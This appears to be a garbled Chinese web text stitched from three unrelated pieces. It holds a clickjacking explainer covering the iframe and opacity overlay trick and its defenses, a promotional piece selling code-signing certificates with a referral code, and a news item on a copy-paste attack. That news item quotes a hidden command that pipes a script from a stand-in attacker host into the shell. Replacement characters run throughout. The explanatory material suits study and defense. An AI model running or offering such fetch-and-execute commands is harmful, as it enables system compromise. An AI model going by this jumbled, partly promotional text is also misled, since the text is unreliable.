界面劫持之點擊劫持
況
01
賽門鐵克(Symantec)在2019年的《互聯網安全威脅報告》中稱:Formjacking 攻擊飆升����,已有取代勒索和挖礦成為互聯網安全最大威脅之勢�。Formjacking 從技術角度看,主要是將惡意 javascript 代碼嵌入到合法網站中���,用于獲取敏感信息,而這種攻擊手法本質上屬于界面劫持中的 clickjacking(點擊劫持)����。本文將結合界面劫持的發展歷程�,以實例講解點擊劫持的原理并介紹目前針對此類攻擊的防御思路���。
界面劫持發展過程
02
界面操作劫持攻擊實際上是一種基于視覺欺騙的 web 會話劫持攻擊����,核心在于使用了<iframe>標簽中的透明屬性,他通過在網頁的可見輸入控件上覆蓋一個不可見的框����,使得用戶誤以為在操作可見控件����,而實際上用戶的操作行為被其不可見的框所劫持�,執行不可見框中的惡意代碼,達到竊取信息���,控制會話,植入木馬等目的���。從發展歷程看,主要有三類:
點擊劫持
點擊劫持又稱UI-覆蓋攻擊�,是2008年由互聯網安全專家羅伯特·漢森和耶利米·格勞斯曼提出點擊劫持的概念�。因為首先劫持的是用戶的鼠標點擊操作�,所以命名叫點擊劫持����。主要劫持目標是含有重要會話交互的頁面,如銀行交易頁面���、后臺管理頁面等。曾經 Twitter 和 Facebook 等著名站點的用戶都遭受過點擊劫持的攻擊����。
拖放劫持
在2010的 Black Hat Europe 大會上���,Paul Stone 提出了點擊劫持的技術演進版本:拖放劫持���。由于用戶需要用鼠標拖放完成的操作越來越多(如復制粘貼�、小游戲等等),拖放劫持大大提高了點擊劫持的攻擊范圍����,將劫持模式從單純的鼠標點擊拓展到了鼠標拖放行為�。最主要的是�,由于拖放操作不受瀏覽器“同源策略“影響,用戶可以把一個域的內容拖放到另一個不同的域���,由此攻擊者可能通過劫持某個頁面的拖放操作實現對其他頁面鏈接的竊取,從而獲得 session key,token,password 等敏感信息���,甚至能將瀏覽器中的頁面內容拖進文本編輯器,查看源代碼�。2011年出現的 Cookiejacking 攻擊就是拖放攻擊的代表���,此攻擊的成因是由于本地 Cookie 可以用<iframe>標簽嵌入���,進而就可以利用拖放劫持來盜取用戶的 Cookie�。
觸屏劫持
隨著觸屏技術的發展�,clickjacking 的攻擊方式也更進一步�,2010年斯坦福公布觸屏劫持攻擊。通過將一個不可見的 iframe 覆蓋到當前網頁上就可以劫持用戶的觸屏操作。由于手機屏幕范圍有限����,手機瀏覽器為了節省空間把地址欄隱藏起來�,因此在手機上的視覺欺騙更容易實施���。
點擊劫持技術原理
03
透明層+iframe
透明層使用了 CSS 中的透明屬性����,在(Chrome,FireFox,Safari,Opera瀏覽器)中
opacity:0.5;數值從0到1����,數值越小透明度越高�,反之越明顯���。
z-index:1����;數值越高越靠近用戶,高數值控件在低數值控件前。
使用 iframe 嵌入被劫持的頁面 <iframe id=”victim” src=”http://www.victime.com”>
opacity:1
opacity:0
目標網頁隱藏技術
目標網頁隱藏技術原理是攻擊者在惡意網站上通過 iframe 載入目標網頁�,然后隱藏目標網頁���,欺騙用戶點擊隱藏的惡意鏈接���。目前主要的網頁隱藏技術有兩種:CSS 隱藏技術和雙 iframe 隱藏技術����。(雙 iframe 隱藏技術使用內聯框架和外聯框架�。內聯框架的主要功能是載入目標網頁,并將目標網頁定位到特定按鈕或者鏈接。外聯框架的主要功能是篩選,只顯示內聯框架中特定的按鈕。)
點擊操作劫持技術
在成功隱藏目標網頁后�,攻擊者下一個目標是欺騙用戶點擊特定的按鈕���,最簡單實用的方法是使用社會工程學。例如�,將攻擊按鈕外觀設計成類似QQ消息的提示按鈕����,誘使用戶點擊從而觸發攻擊行為����。另外一種思路是使用腳本代碼以及其他技術增加用戶點擊特定按鈕的概率。主要方法如 JavaScript 實現鼠標跟隨技術���、按鍵劫持 (Stroke jacking) 技術等。
點擊劫持技術簡單實現
04
1���、Index.html 是一個用戶可見的偽裝頁面,在其頁面中設置 iframe 所在層為透明層����,并在 iframe 中嵌套了 inner.html 頁面
2�、在 index.html 頁面中設計的“Click me”按鈕的位置與 inner.html 頁面中“Login”按鈕的位置重合
3、當用戶以為在點擊 index.html 頁面上的“Click me”按鈕時����,實際是觸發了 inner.html 頁面上的“Login”按鈕的onclick方法
點擊 Click me 卻觸發了上層 iframe 標簽的 inner.html 中 Login 的 onclick()
點擊劫持漏洞的防御技術
05
01
服務器端防御
服務器端防御點擊劫持漏洞的思想是結合瀏覽器的安全機制進行防御���,主要的防御方法介紹如下�。
1����、X-FRAME-OPTIONS 機制
在微軟發布新一代的瀏覽器 Internet Explorer 8.0中首次提出全新的安全機制:
X-FRAME-OPTIONS。該機制有兩個選項:DENY 和 SAMEORIGIN。DENY 表示任何網頁都不能使用 iframe 載入該網頁�,SAMEORIGIN 表示符合同源策略的網頁可以使用 iframe 載入該網頁�。除了 Chrome 和 safari 以外���,還支持第三個參數 Allow-From(白名單限制)����。如果瀏覽器使用了這個安全機制���,在網站發現可疑行為時���,會提示用戶正在瀏覽 網頁存在安全隱患����,并建議用戶在新窗口中打開。這樣攻擊者就無法通過 iframe 隱藏目標的網頁����。
2�、使用 FrameBusting 代碼
點擊劫持攻擊需要首先將目標網站載入到惡意網站中�,使用 iframe 載入網頁是最有效的方法。Web 安全研究人員針對 iframe 特性提出 Frame Busting 代碼���,使用 JavaScript 腳本阻止惡意網站載入網頁。如果檢測到網頁被非法網頁載入���,就執行自動跳轉功能。Frame Busting 代碼是一種有效防御網站被攻擊者惡意載入的方法���,網站開發人員使用 Frame Busting 代碼阻止頁面被非法載入。需要指出的情況是���,如果用戶瀏覽器禁用 JavaScript 腳本,那么 FrameBusting 代碼也無法正常運行����。所以���,該類代碼只能提供部分保障功能。
(禁止iframe的嵌套)
3、使用認證碼認證用戶
點擊劫持漏洞通過偽造網站界面進行攻擊����,網站開發人員可以通過認證碼識別用戶���,確定是用戶發出的點擊命令才執行相應操作����。識別用戶的方法中最有效的方法是認證碼認證�。例如,在網站上廣泛存在的發帖認證碼,要求用戶輸入圖形中的字符���,輸入某些圖形的特征等。
02
客戶端防御
由于點擊劫持攻擊的代碼在客戶端執行,因此客戶端有很多機制可以防御此漏洞���。
1、升級瀏覽器
最新版本的瀏覽器提供很多防御點擊劫持漏洞的安全機制,對于普通的互聯網用戶�,經常更新修復瀏覽器的安全漏洞����,能夠最有效的防止惡意攻擊����。
2�、NoScript 擴展
對于 Firefox 的用戶����,使用 NoScript 擴展能夠在一定程度上檢測和阻止點擊劫持攻擊。利用 NoScript 中 ClearClick 組件能夠檢測和警告潛在的點擊劫持攻擊�,自動檢測頁面中可能不安全的頁面����。
導
在當前的網絡時代���,各種功能的軟件應用程序參與到人們的生活和工作中���,市場規模愈來愈大�,增加了許多的開發公司和軟件開發人員����。但在發布應用程序后,軟件所有者經常會遇到一個挑戰,即用戶在下載時可能會遇到微軟SmartScreen提示“此應用程序不太常見,可能對您的電腦構成風險”,這種警告不僅會削弱用戶的信任度����,導致用戶不敢再繼續安裝使用�;還可能導致下載量下滑�。那么,作為軟件所有者���,要怎么才能消除SmartScreen的這一警告提示呢?
一����、在知道怎么消除警告之前�,先來了解一下SmartScreen和SmartScreen信譽度
1���、什么是SmartScreen���?
SmartScreen�,即Microsoft Defender SmartScreen,是微軟推出的一款安全功能,旨在保護用戶免受網絡欺詐����、惡意軟件站點和潛在危險文件下載的侵害���。SmartScreen會將下載信息發送至微軟���,通過比對已知惡意軟件數據庫和不安全程序列表來判斷下載內容是否安全。一旦檢測到潛在威脅���,將會警告用戶并阻止下載。此外����,它還會參照用戶常用下載清單�,對不在清單內的文件進行安全檢查����,并可能發出預警。
2�、什么是SmartScreen信譽度���?
SmartScreen信譽度是微軟安全系統中一項衡量下載程序安全程度的功能�。它基于全球Internet Explorer���、Microsoft Edge和Windows用戶的反饋���,結合防病毒檢測結果����、下載量統計、下載歷史記錄���、URL信譽度以及其他多種安全指標,判斷一個應用程序的安全可靠性���。如果下載的程序尚未建立起信譽度����,則會向用戶顯示警告信息����。
二����、如何消除SmartScreen“此程序不是常見的下載內容,可能會危害您的計算機”警告���?
最根本的解決方案是建立SmartScreen信譽,為程序獲取并應用一個有效的數字簽名���。這需要:
1、選擇證書頒發機構:
選擇微軟推薦的如Digicert����、Sectigo (Comodo)�、GlobalSign����、JoySSL等CA。
首先���,可以打開JoySSL的官方網站。注冊一個新賬號�。在注冊過程中����,最后一欄會要求填寫一個注冊碼以享受特定優惠或服務�。可以填寫“230915”來獲取證書詳細對比資料�。
證書地址https://www.joyssl.com/certificate/select/code_signing.html?nid=15
2���、代碼簽名證書的選擇:
EV代碼簽名證書可以立即獲得SmartScreen信譽����。這樣一來�,當用戶下載時����,Windows中的SmartScreen警告將不再出現。
OV代碼簽名證書需要通過累計下載量來逐步建立信譽。當應用程序下載安裝達到一定規模����,被廣大Windows用戶接受并認定為“常見安全應用”時����,SmartScreen才會取消警告提示�。
3、提高用戶認可度:
鼓勵用戶積極評價和推薦您的應用程序。
總而言之,軟件所有者可以通過使用合適的代碼簽名證書對應用程序進行數字簽名����,以此來逐步積累SmartScreen信譽����,最終消除SmartScreen警告�,從而增強用戶下載和使用軟件的信心。使得應用程序有更多的下載量和用戶群體,達到良性的循環���。
全研究人員警告,HTML頁面上的命令列可能藏匿惡意程序碼,開發者稍有不察直接復制貼上終端時����,可能就讓黑客得以于程序中植入后門���。
復制粘貼要當心�,病毒代碼在執行
一名安全研究人員Gabriel Friedlander近日警告���,隨手從網絡上復制與貼上(Copy/Paste)命令列時要特別小心����,因為黑客可能趁此駭進開發者的系統或應用程序。
Friedlander打造了一個概念性驗證攻擊手法�,他設計一個假裝可用來更新Ubuntu作業系統的命令列����,該命令列顯示的文字很簡單����,為「sudo apt update」,但當開發者復制它,并將它貼上記事本或終端時�,它出現的卻是「curl http[:]//attacker-domain:8000/shell.sh | sh 」�,若是直接貼入終端����,它將立即執行。
這是因為Friedlander在此一HTML頁面上藏匿了JavaScript程序碼,而讓開發者眼見的文字與貼上之后所呈現的內容完全不同����。
Friedlander說����,不管是新手或是熟練的開發者���,都可能會從網絡上復制命令列或部份程序碼����,但這是非常危險的行為,也許會讓黑客直接于程序中植入后門����,相關的攻擊非常地簡單���,卻可能帶來極大的傷害����,建議開發者應永遠避免于終端貼上直接自網絡上復制的命令列���。
